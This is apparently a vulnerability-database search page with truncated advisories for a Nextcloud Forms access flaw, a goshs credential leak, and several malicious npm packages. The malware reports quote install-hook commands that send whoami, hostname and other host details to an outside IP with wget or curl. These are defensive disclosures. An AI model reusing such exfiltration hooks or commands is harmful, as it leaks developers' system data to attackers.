134 matches found
CVE-2026-45543
Nextcloud is an open source content collaboration platform. From version 4.3.0 to before version 5.2.7, a removed collaborator retains unauthorized read access to uploaded respondent files for the affected form. The scope is limited to uploaded files for forms where that user previously had resul...
CVE-2026-40885
goshs is a SimpleHTTPServer written in Go. From 2.0.0-beta.4 to 2.0.0-beta.5, goshs leaks file-based ACL credentials through its public collaborator feed when the server is deployed without global basic auth. Requests to .goshs-protected folders are logged before authorization is enforced, and th...
CVE-2026-45543
Nextcloud is an open source content collaboration platform. From version 4.3.0 to before version 5.2.7, a removed collaborator retains unauthorized read access to uploaded respondent files for the affected form. The scope is limited to uploaded files for forms where that user previously had resul...
CVE-2026-45543 Nextcloud: Deleting a Forms collaborator share leaves uploaded response files accessible through a lingering Files share
Nextcloud is an open source content collaboration platform. From version 4.3.0 to before version 5.2.7, a removed collaborator retains unauthorized read access to uploaded respondent files for the affected form. The scope is limited to uploaded files for forms where that user previously had resul...
CVE-2026-45543
Nextcloud is an open source content collaboration platform. From version 4.3.0 to before version 5.2.7, a removed collaborator retains unauthorized read access to uploaded respondent files for the affected form. The scope is limited to uploaded files for forms where that user previously had resul...
CVE-2026-45543
Nextcloud Forms vulnerability CVE-2026-45543: From versions 4.3.0 through before 5.2.7, removing a collaborator did not revoke read access to uploaded respondent files for affected forms, enabling unauthorized access to those files (scope limited to forms where the user previously had results acc...
CVE-2026-45543 Nextcloud: Deleting a Forms collaborator share leaves uploaded response files accessible through a lingering Files share
Nextcloud is an open source content collaboration platform. From version 4.3.0 to before version 5.2.7, a removed collaborator retains unauthorized read access to uploaded respondent files for the affected form. The scope is limited to uploaded files for forms where that user previously had resul...
EUVD-2026-33713
Nextcloud is an open source content collaboration platform. From version 4.3.0 to before version 5.2.7, a removed collaborator retains unauthorized read access to uploaded respondent files for the affected form. The scope is limited to uploaded files for forms where that user previously had resul...
PT-2026-45531
Nextcloud is an open source content collaboration platform. From version 4.3.0 to before version 5.2.7, a removed collaborator retains unauthorized read access to uploaded respondent files for the affected form. The scope is limited to uploaded files for forms where that user previously had resul...
NextCloud Forms security vulnerabilities
NextCloud Forms is an open-source, hosted questionnaire and form creation tool developed by NextCloud. There were security vulnerabilities in versions 4.3.0 to 5.2.7 of NextCloud Forms, which stemmed from unauthorized access to respondent files uploaded through affected forms, due to retained...
Malicious code in claude-channel-imessage (npm)
--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector 9751c370c062cb40bccb874f46679ad3ca8ba9d3b49d0d8ba1f924d9582e53a3 On npm install, postinstall.js executes whoami and id, reads os.hostname, os.platform, process.cwd, and the CI, GITHUBREPOSITORY, and NODEENV...
Malicious code in cloudpivot (npm)
--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector 4bd95ac92732da86e3ec63771e124da83ea8d98e1dd2f6636ab3d8dde76ab34c On npm install, the package.json preinstall hook runs wget against http://194.120.24.50:7374 with query parameters carrying $whoami, $pwd, $hostname,...
MAL-2026-4529 Malicious code in cloudpivot (npm)
--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector 4bd95ac92732da86e3ec63771e124da83ea8d98e1dd2f6636ab3d8dde76ab34c On npm install, the package.json preinstall hook runs wget against http://194.120.24.50:7374 with query parameters carrying $whoami, $pwd, $hostname,...
Malicious code in pg-expense-example (npm)
--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector d1d939ad3f0e8e9754bf3562f06692713a76d5c0f18ac13c956f9cb199ed0fbf On require/load, index.js unconditionally collects host identifiers hostname, username, platform, arch, cwd, pid and sends them as URL query paramete...
Malicious code in mmt-static (npm)
--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector 755d0176c106903bf2baaf14d0bb4df611bb719c2a7b0615e9b4487eadee1300 On npm install, the package's preinstall lifecycle hook executes node index.js && curl --data-urlencode "info=$hostname && whoami"...
Malicious code in openmct-couch-plugin (npm)
--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector ce8eff366d17efa64bf8605941d009d01cf7a24aaf011af30faec449fc4a2e28 On npm install, the package's preinstall script runs node index.js and then curls the output of hostname && whoami to...
MAL-2026-4634 Malicious code in osep-react-antd (npm)
--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector 9373e8880ad89854cc168b48a36c59bd72abfaf220e08fb751b948f0c4d8ddfb package.json declares preinstall: node index.js, which runs automatically on npm install. index.js collects host identifiers os.hostname,...
Malicious code in osep-api-hub-service-client-v1 (npm)
--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector cd131719d20e013a4627e1ea402ffc26135d66a5d6dd35669b8a3a6fb85e5f76 package.json declares "preinstall": "node index.js", causing index.js to run automatically on npm install. index.js collects host identifiers —...
Malicious code in search-connector-template (npm)
--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector 24aea8e5a7338c49dc96e3945ed4d695024c2e169f560e6f3426005ca4666ea4 package.json declares preinstall: node index.js, which fires automatically on npm install. index.js collects host identity hostname, username, homedi...
MAL-2026-4664 Malicious code in search-connector-template (npm)
--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector 24aea8e5a7338c49dc96e3945ed4d695024c2e169f560e6f3426005ca4666ea4 package.json declares preinstall: node index.js, which fires automatically on npm install. index.js collects host identity hostname, username, homedi...